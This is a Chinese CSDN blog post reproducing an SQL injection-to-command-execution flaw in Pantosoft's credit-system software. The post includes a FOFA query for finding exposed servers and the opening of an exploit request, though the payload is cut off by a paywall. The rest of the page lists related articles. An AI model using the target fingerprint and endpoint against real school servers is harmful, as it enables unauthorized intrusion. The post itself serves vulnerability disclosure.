【漏洞复现】学分制系统 GetCalendarContentById SQL注入漏洞getshell

于 2024-10-21 15:04:37 发布
阅读量332 收藏 3
点赞数 10
CC 4.0 BY-SA版权
分类专栏: 漏洞复现 渗透测试 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46381222/article/details/143112554

免责声明

请勿使用本文中提到的技术进行非法测试或行为。使用本文中提供的信息或工具所造成的任何后果和损失由使用者自行承担,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

一、简介

学分制系统是由上海鹏达计算机系统开发有限公司研发的一款综合性管理系统,专为职业教育设计。它基于对职业教育特点和需求的深入理解,结合教育部相关文件精神,并吸纳专家、学者意见,通过模块化设计,方便学校根据自身教学改革和信息化建设进程,灵活选择和组合适应自身特点的管理软件。

二、漏洞描述

学分制系统 GetCalendarContentById 存在SQL注入漏洞,未经身份验证的远程攻击者可利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令,从而控制服务器。

三、fofa语法

body="www.pantosoft.com" && body="Pantosoft Corporation" || icon_hash="-1632820573"

四、漏洞复现

POST /WebService_PantoSchool.asmx HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
Content-Type: text/xml; charset=utf-8
Connection: close
Content-Length: 360

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
  <soapenv:Header/>
    &
最低0.47元/天 解锁文章

200万优质内容无限畅学
学分制系统 WebService_PantoSchool SQL注入致RCE漏洞复现
0xSec
06-20 1066
学分制系统 GetCalendarContentById、GetCurrentCalendar等实例处存在SQL注入漏洞,未经身份验证的远程攻击者可利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令,从而控制服务器。经过分析与研判,该漏洞利用难度低,建议尽快修复。
高校学分制选课管理系统(JAVA,JSP,SERVLET,SQLSERVER)
gengdong_1的博客
09-18 1346
高校学分制选课管理系统(JAVA,JSP,SERVLET,SQLSERVER)(毕业论文14000字以上,共32页,程序代码) 【下载源码+论文】 【运行环境】 MyEclipse, JDK, Tomcat, SQLSERVER 【技术栈】JAVA,JSP,SERVLET,SQLSERVER,HTML,CSS,JAVASCRIPT 【项目包含内容】 【文档包含内容】 【项目功能介绍】 选课管理系统是将IT技术用于选课信息的管理,它能够收集与存储患者信息,提供更新与检索的接口;...
下载文件
贤和知识点收藏
04-13 289
import java.net.*; import java.io.*; public class URLConnectionDemo{     public static void main(String[] args)throws Exception{         URL url = new URL("http://www.scp.edu.cn/pantoschoo
SQL注入01】SQL注入漏洞简介、原理及类型
Fighting_hawk的博客
02-17 5799
1. 了解SQL注入漏洞的概念和危害; 2. 理解SQL注入漏洞产生的两个条件; 3. 了解SQL注入分类方式; 4. 加深SQL和数据库相关知识的理解。
高校学籍管理系统SQL Server数据库课程设计)
热门推荐
qq_52030824的博客
12-22 7万+
摘要: 高校的管理工作是一项复杂且系统化的工作。而随着当代社会积极响应国家“科教兴国”的战略。高校建设规模和招生人数每年均高不下,庞大的学生群体对高校的管理工作带来了巨大的挑战。而对学生的学籍管理工作更是高校管理工作的一个重要环节。 面对高校学生学籍信息如此庞大的数据群,如采用传统的管理模式,管理工作的效率不仅低下,而且数据错误的发生率相对较高,还会产生人力和物力上的巨大开支。面对这样的情况,开发一个高校学籍管理系统就显得尤为重要。 运用高校学籍管理系统可以大大提高高校管理工作效率、方便系统维护、减小开支、
C# Windows窗体应用与SQL Server制作的选课系统
zhj12399的博客
09-12 2246
C# Windows窗体应用制作的选课系统项目要求项目成果项目源码源码地址End 项目要求 北理工小学期数据库大作业 设计数据库,基本信息包括学生、课程、教师,学生从已分配教师的课程列表中选择相应的课程(课程列表项信息包括:课程名称、学分、授课教师、授课时间等,可以手工录入已分配教师、上课时间的课程列表信息)。 选课规则:每个学生最少选择3门课程,学分高于8学分,最多可以选择5门课程,学分不超过12学分。 实现下列功能: (1) 录入学号,自动显示学生姓名。 (2) 在可选择课程列表上方显示已选择的课程列表
学生选课系统sql
fishermanMr
11-04 9744
学生选课系统 1.创建学生选课系统 2.切换数据库 3.创建学生表 tbstudent 主键stuid ,姓名stuname,性别stusex,生日stubirth,电话stutel,住址stuaddr,照片shuphoto(以二进制存) 4.创建课程表tbcourse 主键cosid,班级名称cosname,学分coscredit,课程描述cosintro 5.学生选课记录表tbsc 主键sci...
社团活动学分管理系统
戴璞微的学习之路
07-09 4970
摘要之前忙于期末考试,所以没有时间把期末之前的课设写成博客。这次的课设虽然给定了可选题目,但是老师说做什么都可以。看见可选题目里有关于学分管理系统,考虑到时间紧迫,同时兼顾期末考试,故选择了这个社团学分管理系统。这里我也很感谢自己在校团委管理全校活动学分的同学为我这次课设提供了真实的学分数据。资源已经上传,如要下载请移步:http://download.csdn.net/detail/qq_3009
基于Java的学生成绩学分制管理系统设计源码
04-18
本项目是基于Java的学生成绩学分制管理系统设计源码,包含114个文件,其中主要包含61个java源代码文件,14个xml配置文件,14个png图片文件等。系统采用了Java、JavaScript、CSS和HTML技术,实现了学生成绩学分制管理...
毕业设计javajsp学分制选课管理系统(jsp+sqlserver)-qkrp源码含文档
07-19
毕业设计javajsp学分制选课管理系统(jsp+sqlserver)-qkrp源码含文档 页面是jsp,数据库sqlserver,jdk1.8,开发工具用ecplise、myecplise、sts、idea都可以 系统实现了对课程的基本信息和学生选课、学生和教师用户...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8743
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
sqlite-jdbc-3.27.2.1.jar中文文档.zip
最新发布
08-02
1、压缩文件中包含: 中文文档、jar包下载地址、Maven依赖、Gradle依赖、源代码下载地址。 2、使用方法: 解压最外层zip,再解压其中的zip包,双击 【index.html】 文件,即可用浏览器打开、进行查看。 3、特殊说明: (1)本文档为人性化翻译,精心制作,请放心使用; (2)只翻译了该翻译的内容,如:注释、说明、描述、用法讲解 等; (3)不该翻译的内容保持原样,如:类名、方法名、包名、类型、关键字、代码 等。 4、温馨提示: (1)为了防止解压后路径太长导致浏览器无法打开,推荐在解压时选择“解压到当前文件夹”(放心,自带文件夹,文件不会散落一地); (2)有时,一套Java组件会有多个jar,所以在下载前,请仔细阅读本篇描述,以确保这就是你需要的文件。 5、本文件关键字: jar中文文档.zip,java,jar包,Maven,第三方jar包,组件,开源组件,第三方组件,Gradle,中文API文档,手册,开发手册,使用手册,参考手册。
spring-jdbc-4.0.5.RELEASE.jar中文文档.zip
08-02
1、压缩文件中包含: 中文文档、jar包下载地址、Maven依赖、Gradle依赖、源代码下载地址。 2、使用方法: 解压最外层zip,再解压其中的zip包,双击 【index.html】 文件,即可用浏览器打开、进行查看。 3、特殊说明: (1)本文档为人性化翻译,精心制作,请放心使用; (2)只翻译了该翻译的内容,如:注释、说明、描述、用法讲解 等; (3)不该翻译的内容保持原样,如:类名、方法名、包名、类型、关键字、代码 等。 4、温馨提示: (1)为了防止解压后路径太长导致浏览器无法打开,推荐在解压时选择“解压到当前文件夹”(放心,自带文件夹,文件不会散落一地); (2)有时,一套Java组件会有多个jar,所以在下载前,请仔细阅读本篇描述,以确保这就是你需要的文件。 5、本文件关键字: jar中文文档.zip,java,jar包,Maven,第三方jar包,组件,开源组件,第三方组件,Gradle,中文API文档,手册,开发手册,使用手册,参考手册。
Linux 版微信开发者工具:支持最新微信小程序与网页开发最新版
08-02
资源下载链接为: https://pan.quark.cn/s/92be6f56db81 Linux 版微信开发者工具:支持最新微信小程序与网页开发最新版(最新、最全版本!打开链接下载即可用!)
《04D702-1常用低压配电设备安装图集完整版》
08-02
资源下载链接为: https://pan.quark.cn/s/d9ef5828b597 《04D702 - 1 常用低压配电设备安装图集》PDF 版本,04D702 - 1 常用低压配电设备安装图集
spring-jdbc-3.2.1.RELEASE.jar中文-英文对照文档.zip
08-02
1、压缩文件中包含: 中文-英文对照文档、jar包下载地址、Maven依赖、Gradle依赖、源代码下载地址。 2、使用方法: 解压最外层zip,再解压其中的zip包,双击 【index.html】 文件,即可用浏览器打开、进行查看。 3、特殊说明: (1)本文档为人性化翻译,精心制作,请放心使用; (2)只翻译了该翻译的内容,如:注释、说明、描述、用法讲解 等; (3)不该翻译的内容保持原样,如:类名、方法名、包名、类型、关键字、代码 等。 4、温馨提示: (1)为了防止解压后路径太长导致浏览器无法打开,推荐在解压时选择“解压到当前文件夹”(放心,自带文件夹,文件不会散落一地); (2)有时,一套Java组件会有多个jar,所以在下载前,请仔细阅读本篇描述,以确保这就是你需要的文件。 5、本文件关键字: jar中文-英文对照文档.zip,java,jar包,Maven,第三方jar包,组件,开源组件,第三方组件,Gradle,中文API文档,手册,开发手册,使用手册,参考手册。
spring-data-redis-1.8.0.RC1.jar中文-英文对照文档.zip
08-02
1、压缩文件中包含: 中文-英文对照文档、jar包下载地址、Maven依赖、Gradle依赖、源代码下载地址。 2、使用方法: 解压最外层zip,再解压其中的zip包,双击 【index.html】 文件,即可用浏览器打开、进行查看。 3、特殊说明: (1)本文档为人性化翻译,精心制作,请放心使用; (2)只翻译了该翻译的内容,如:注释、说明、描述、用法讲解 等; (3)不该翻译的内容保持原样,如:类名、方法名、包名、类型、关键字、代码 等。 4、温馨提示: (1)为了防止解压后路径太长导致浏览器无法打开,推荐在解压时选择“解压到当前文件夹”(放心,自带文件夹,文件不会散落一地); (2)有时,一套Java组件会有多个jar,所以在下载前,请仔细阅读本篇描述,以确保这就是你需要的文件。 5、本文件关键字: jar中文-英文对照文档.zip,java,jar包,Maven,第三方jar包,组件,开源组件,第三方组件,Gradle,中文API文档,手册,开发手册,使用手册,参考手册。
sqlite-jdbc-3.36.0.jar中文-英文对照文档.zip
08-02
1、压缩文件中包含: 中文-英文对照文档、jar包下载地址、Maven依赖、Gradle依赖、源代码下载地址。 2、使用方法: 解压最外层zip,再解压其中的zip包,双击 【index.html】 文件,即可用浏览器打开、进行查看。 3、特殊说明: (1)本文档为人性化翻译,精心制作,请放心使用; (2)只翻译了该翻译的内容,如:注释、说明、描述、用法讲解 等; (3)不该翻译的内容保持原样,如:类名、方法名、包名、类型、关键字、代码 等。 4、温馨提示: (1)为了防止解压后路径太长导致浏览器无法打开,推荐在解压时选择“解压到当前文件夹”(放心,自带文件夹,文件不会散落一地); (2)有时,一套Java组件会有多个jar,所以在下载前,请仔细阅读本篇描述,以确保这就是你需要的文件。 5、本文件关键字: jar中文-英文对照文档.zip,java,jar包,Maven,第三方jar包,组件,开源组件,第三方组件,Gradle,中文API文档,手册,开发手册,使用手册,参考手册。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值